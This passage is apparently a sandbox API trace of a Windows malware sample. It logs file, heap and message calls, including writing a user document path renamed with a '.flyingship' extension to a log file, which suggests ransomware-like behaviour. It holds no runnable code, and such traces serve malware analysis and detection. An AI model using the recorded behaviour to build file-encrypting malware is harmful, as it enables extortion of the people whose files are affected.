0x9bd7b0 [0175.971] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0175.972] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.972] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0175.972] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.972] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0175.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0175.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0175.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0175.973] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0175.973] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x14dc, lpOverlapped=0x0) returned 1 [0175.973] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0175.974] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x14dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.974] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0175.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0175.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0175.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.flyingship.docx\r\n", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0175.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x48) returned 0x9aa4f8 [0175.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.flyingship.docx\r\n", cchWideChar=72, lpMultiByteStr=0x9aa4f8, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.flyingship.docx\r\n", lpUsedDefaultChar=0x0) returned 72 [0175.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0175.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0175.974] WriteFile (in: hFile=0x138, lpBuffer=0x923ad0*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923ad0*, lpNumberOfBytesWritten=0x87f43c*=0x47, lpOverlapped=0x0) returned 1 [0175.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0175.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.974] CloseHandle (hObject=0x138) returned 1 [0175.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0175.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0175.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0175.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0175.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0175.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0175.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0175.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0175.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0175.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0175.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0175.976] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0175.976] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0175.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0175.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0175.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0175.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0175.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0175.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0175.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0175.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0175.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0175.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0175.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0175.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0175.978] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0175.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0175.978] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0175.978] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0175.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0175.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0175.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0175.978] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0175.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0175.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0175.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0175.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0175.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0175.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0175.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0175.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0175.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0175.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0175.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3a8 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0175.979] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0175.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0175.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0175.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0175.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0175.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0175.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0175.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0175.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0175.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0175.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0175.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0175.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0175.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0175.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0175.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0175.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0175.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0175.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0175.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0175.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0175.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0175.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0175.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0175.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0175.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0175.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0175.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0175.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0175.982] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0175.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0175.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0175.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0175.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0175.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0175.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0175.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0175.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0175.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0175.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0175.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0175.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0175.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0175.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0175.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0175.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 